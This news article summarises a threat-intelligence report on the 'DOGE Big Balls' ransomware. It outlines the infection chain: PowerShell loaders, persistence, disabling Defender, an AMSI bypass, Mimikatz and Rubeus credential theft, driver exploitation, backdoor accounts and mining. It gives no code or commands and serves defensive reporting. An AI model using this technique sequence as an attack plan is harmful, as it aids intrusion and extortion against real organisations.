A recent discovery by Netskope Threat Labs has brought to light a highly complex ransomware variant dubbed “DOGE Big Balls,” a derivative of the Fog ransomware.
Named provocatively after the Department of Government Efficiency (DOGE), this ransomware incorporates political statements and taunts in its payloads, including references to public figures and YouTube videos.
The ransomware’s arsenal comprises an intricate multi-stage infection chain that utilizes a blend of custom PowerShell scripts, open-source tools like Mimikatz and Rubeus, vulnerable driver exploits, and red team frameworks such as Havoc.
.png
)
The frequent updates to its payloads, hosted on platforms like Netlify, underscore the adaptability and persistence of the threat actors behind this campaign.
Unveiling a Sophisticated Ransomware Variant
The infection process begins with an MSI file, payload.msi, which likely spreads through phishing emails or exploitation of vulnerable services, as suggested by historical reports from Trend Micro and Cyble.
Upon execution, the MSI triggers a PowerShell script, wix.ps1, encoded with base64 and XOR encryption, to check for administrative privileges and establish persistence via an LNK file named “EdgeAutoUpdater.lnk” in the Windows Startup folder and a scheduled task, “EdgeAutoUpdaterTask.”
This leads to the download and execution of stage1.ps1 from a central URL, which creates a hidden directory in the Startup folder, disables Windows Defender, and sets additional persistence through registry Run keys.
Stage1.ps1 further downloads a series of payloads, including cwiper.exe, ktool.exe, and several shell scripts, evolving over time to include the DOGE Big Balls ransomware binary itself, alongside Havoc Demon payloads exploiting vulnerabilities like CVE-2015-2291 in the iQVW64.sys driver.
The Multi-Stage Infection Chain
Subsequent scripts such as amsibypass.ps1 target Windows Antimalware Scan Interface (AMSI) by patching the AmsiScanBuffer function to evade detection, while pivot.ps1 facilitates lateral movement via Invoke-Mimikatz.ps1 for credential dumping and Invoke-SMBExec.ps1 for SMB-based propagation.
The scripts gather extensive reconnaissance data, including public IP, open ports, and password hashes for Pass-The-Hash attacks, disseminating stage1.ps1 across Active Directory (AD) environments.
Additional scripts like dcstage1.ps1 and rubeuspivot.ps1 focus on Domain Controllers, employing Rubeus for Pass-The-Ticket attacks and creating backdoor accounts like “svcadmin” for sustained access.
Tools like ZeroTier, installed via ztinstall.ps1, and potential Cobalt Strike beacons through webdelivery.ps1, enhance remote access capabilities for the attackers.
Moreover, scripts like xmrigstart.ps1 deploy cryptocurrency miners, adding a financial motive to the destructive intent of the ransomware.
The continuous evolution of payloads, with new additions like addadmins.ps1 for administrator account creation and shwatchdog.ps1 for process monitoring, illustrates the dynamic and relentless nature of this threat.
According to the Report, Netskope’s detection signatures, including Generic.ShellCode.Marte.2.F02D5747 and Script-PowerShell.Trojan.Powdow, aim to counter these attacks, yet the complexity and rapid updates pose significant challenges.
The DOGE Big Balls ransomware exemplifies the growing sophistication of cyber threats, merging technical prowess with psychological provocation, necessitating robust defense mechanisms and vigilant monitoring to mitigate its impact on targeted environments.
Setting Up SOC Team? – Download Free Ultimate SIEM Pricing Guide (PDF) For Your SOC Team -> Free Download
